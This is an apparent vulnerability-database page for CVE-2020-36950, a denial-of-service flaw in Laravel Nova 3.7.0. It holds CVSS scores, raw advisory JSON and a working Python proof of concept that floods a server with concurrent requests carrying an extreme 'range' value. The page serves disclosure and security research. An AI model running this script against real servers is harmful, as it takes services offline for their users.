Security Vulnerability Report
中文
CVE-2020-36950 CVSS 6.5 MEDIUM

CVE-2020-36950

Published: 2026-01-27 16:16:13
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Laravel Nova 3.7.0 contains a denial of service vulnerability that allows authenticated users to crash the application by manipulating the 'range' parameter. Attackers can send simultaneous requests with an extremely high range value to overwhelm and crash the server.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Laravel Nova < 3.8.0
Laravel Nova 3.7.0 (受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2020-36950 Laravel Nova DoS PoC # Usage: python3 nova_dos_poc.py <target_url> <session_cookie> import requests import sys import concurrent.futures def send_dos_request(url, session_cookie): """Send a single DoS request with large range parameter""" headers = { 'Cookie': f'nova_session={session_cookie}', 'Content-Type': 'application/x-www-form-urlencoded' } # Exploit the range parameter with extreme value data = { 'range': '999999999', 'perPage': '1000' } try: response = requests.post(url, headers=headers, data=data, timeout=30) return response.status_code except requests.exceptions.RequestException as e: return f"Error: {e}" def main(): if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <target_url> <session_cookie>") sys.exit(1) target_url = sys.argv[1] session_cookie = sys.argv[2] print(f"[*] Starting DoS attack on {target_url}") print(f"[*] Target: Laravel Nova with range parameter vulnerability") # Launch concurrent requests to overwhelm the server with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor: futures = [executor.submit(send_dos_request, target_url, session_cookie) for _ in range(100)] results = [f.result() for f in concurrent.futures.as_completed(futures)] print(f"[*] Sent {len(results)} requests") print(f"[*] Attack completed") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36950", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:12.553", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Laravel Nova 3.7.0 contains a denial of service vulnerability that allows authenticated users to crash the application by manipulating the 'range' parameter. Attackers can send simultaneous requests with an extremely high range value to overwhelm and crash the server."}, {"lang": "es", "value": "Laravel Nova 3.7.0 contiene una vulnerabilidad de denegación de servicio que permite a usuarios autenticados colapsar la aplicación manipulando el parámetro 'range'. Los atacantes pueden enviar solicitudes simultáneas con un valor de 'range' extremadamente alto para sobrecargar y colapsar el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://nova.laravel.com/", "source": "[email protected]"}, {"url": "https://nova.laravel.com/releases", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49198", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/laravel-nova-range-dos", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.